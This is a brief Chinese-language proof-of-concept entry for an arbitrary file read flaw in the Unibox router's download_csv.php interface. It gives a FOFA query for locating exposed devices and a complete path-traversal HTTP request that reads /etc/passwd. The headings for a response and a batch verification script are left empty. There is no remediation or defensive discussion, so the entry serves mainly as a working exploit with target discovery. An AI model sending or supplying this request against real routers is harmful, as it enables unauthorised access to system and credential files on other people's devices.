漏洞描述
Unibox路由器download_csv.php接口存在任意文件读取
资产收集
fofa
body="Unibox" && body="Controller"
发送请求
GET /tools/download_csv.php?download_file=../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive返回包

批量验证脚本